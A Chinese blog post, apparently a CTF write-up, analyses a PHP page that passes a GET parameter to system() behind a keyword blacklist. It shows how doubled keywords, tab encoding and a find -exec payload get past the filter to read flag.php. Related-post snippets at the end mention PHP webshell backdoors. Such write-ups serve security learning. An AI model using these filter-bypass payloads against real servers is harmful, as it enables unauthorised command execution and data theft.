Web命令执行

已于 2023-07-07 20:23:52 修改
阅读量242 收藏
点赞数
分类专栏: CTF 文章标签: 计算机网络 经验分享 笔记 学习方法
于 2023-07-07 20:19:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45906533/article/details/131603749
版权
文章分析了一个PHP代码示例,该代码存在Web远程命令执行(RCE)漏洞。通过检查GET参数cmd,当其非空时执行系统命令,但使用了黑名单和str_replace函数尝试阻止特定危险命令。然而,通过字符串双写、编码等方法,可以绕过限制,如使用find命令结合编码规避来读取flag.php的内容,从而实现命令执行。
摘要由CSDN通过智能技术生成

Web RCE

源代码

<?php 
if(isset($_GET['cmd'])){
        $cmd=$_GET['cmd'];
}else{
        show_source(__FILE__);
        die();
}
$blacklist = array(';', '|', '*', '?', '.', '&', '`', '%', '(', ')', 'cat', 'ls', 'flag',' ');
foreach ($blacklist as $word) {
    $cmd = str_replace($word, '', $cmd);
}
system($cmd);
?>

代码分析:

  • 判断cmd是否为空,然后返回网页源代码
  • blacklist是一个数组,里面的值,用来丢给str_replace函数进行替换操作
  • 如果cmd里面的值在blacklist里面,那么就会被替换为空

根据上面的分析我们可以得知,如果想要执行命令,我们需要绕过str_replace函数

像这种替换操作,如果是字符串我们正常可以双写绕过,我们先看看可以执行哪些命令

在这里插入图片描述
命令执行成功,那么我们使用ls看看当前目录下有什么文件,注意lsblacklist里面,所以要双写绕过一下
在这里插入图片描述
可以看到flag.php了,那么接下来肯定是需要查看它里面的文件内容了

常规查看命令:cat flag.php
从上面的blacklist里面,可以得知,cat,空格,flag,“.” 都被过滤了

  • cat 双写
  • 空格 %09(tab)
  • flag 双写
  • “.” 可以使用不指定文件名就可以查看文件内容的命令

最终payload

find%09/var/www/html%09-maxdepth%091%09-type%09f%09-exec%09cacatt%09{}%09\%2b

解码后的

find	/var/www/html	-maxdepth	1	-type	f	-exec	cacatt	{}	\+

本来这个命令是以;结尾的,但是被禁了,所以我们可以用+号代替(注意+一定要编码)

得到flag
在这里插入图片描述

Ten^v^
关注
专栏目录
php执行cmd/shell命令 木马小后门
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-03 4337
php执行shell命令,可以使用下面几个函数: string system ( string $command [, int &$return_var ] ) string exec ( string $command [, array &$output [, int &$return_var ]] ) void passthru ( string $command [, int &$return_var ] )  注意的是:这三个函数在默认的情况下,都是被禁止.
web-命令执行
wo41ge的博客
11-11 780
目录web29-过滤关键字web30-增加命令执行函数 web29-过滤关键字 命令执行,需要严格的过滤 进入题目链接 这是源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: h
执行网页命令
快乐不打烊的窝
03-06 590
//********************************************************************* //*               用在“执行网页命令”的方法   Microsoft Windows     ** //*            Copyright(c) Microsoft Corp., 1996-1998
Web安全之命令执行getshell
最新发布
good good study day day up
07-29 1435
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令执行
Webshell下执行Cmd的小技巧
weixin_33875839的博客
01-12 610
webshell下执行CMD,按照常规, path:c:\\windows\\temp\\cmd.exe 查用户 Command: /c net user 这个情况是system32目录的net.exe 你能调用到。 要是调用不到,只能传文件到执行目录。 假设更cmd在同一个目录,c:\\windows\\temp\\net.exe 那就是...
webshell下执行CMD的小技巧
weixin_33874713的博客
01-19 677
webshell下执行CMD,按照常规,一般都是这样写: path:c:\\windows\\temp\\cmd.exe 查用户命令: Command: /c net user 这个情况是system32目录下的net.exe你能调用到,要是调用不到(被管理员赋予了高级别权限或者干脆被删了),就只能自行上传一个文件到可执行目录。 假设net.exe和cmd.exe...
在浏览器中执行命令文件
one_dollar
10-25 1645
在浏览器中执行命令文件
WEB安全之:命令执行
f_carey的博客
06-23 895
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 命令执行1 命令执行介绍2 命令执行函数2.1 远程命令执行函数2.2 系统执行命令2.2.1 常用系统执行命令2.2.2 常用命令执行特殊字符3 漏洞利用3.1 通过命令执行写入恶意文件3.2 利用特殊字符执行系统命令 1 命令执行介绍 产生原因: 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成.
[ctfshow]web入门——命令执行web118-web122+web124)
ShenZ的博客
02-28 3781
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
命令执行Web服务
10-20
命令执行Web服务】是指通过特定的命令来调用和执行Web服务的一种技术。Web服务是一种基于网络的、能够被不同应用系统之间互相调用的软件接口,它使用标准的XML(可扩展标记语言)来定义其接口和数据传输格式。这种...
web安全防护命令执行课件PPT
11-21
命令注入和命令执行是网络安全中的关键概念,它们与Web应用程序的安全性密切相关。命令注入是一种攻击技术,攻击者通过输入恶意命令到应用或系统中,使其执行非预期的操作,通常源于应用程序对用户输入的不当处理。...
网页采用命令行方式调用exe
06-02
网页通过命令行方式调用控制台exe。内包含html测试demo,以及exe调用动态库及处理命令行参数的工程。
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
命令运行程序:Web API在系统上运行命令
02-10
ReactJS负责构建用户界面,可以通过向后端发送请求来触发命令执行。使用TypeScript开发React组件,可以利用类型系统增强组件的健壮性,同时提高代码的可读性和可维护性。 6. **前后端交互**: 客户端(ReactJS)...
如何讲清楚async和await?_,ajaxa,azqa,(1),2024年最新细节决定成败
2401_83974020的博客
04-20 921
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。//那么这里就是在等待ajaxA请求的完成。//wait这个单词是等待的意思。
Web入门---命令执行
s849602863的博客
05-21 1044
ctfshow-Web入门---命令执行
命令执行web入门
2201_75316477的博客
12-30 1513
我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。如果对取反不了解可以百度一下,这里给个容易记得式子,如果对a按位取反,则得到的结果为-(a+1),也就是对0取反得到-1。其中%09,%26不受数字被过滤的影响,因为在加载时%09,%26会被解码为空格和分号,也就没有了数字。过滤了冒号,不能用伪协议了,没有过滤英文状态的**()** 和**;这下好了,过滤了字母,但是数字没有过滤,数字?
web中常用操作
weixin_31449201的博客
06-01 1036
1.接收浏览器的请求报文self.request = socket_con.recv(4096).decode()if self.request: # 如果收到 # 将请求报文这整个字符串,截取成一行一行的字符串,存储到request_lines这个列表中 request_lines = self.request.split("\r\n") ...
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1438
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令执行
web命令执行常见绕过方式
07-10
常见的Web命令执行绕过方式包括: 1. 输入过滤:攻击者可能会尝试通过绕过输入过滤来执行命令。他们可能会使用特殊字符、编码或其他技术来绕过输入验证。 2. 输入截断:攻击者可能会尝试通过在输入中插入特殊字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ten^v^

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值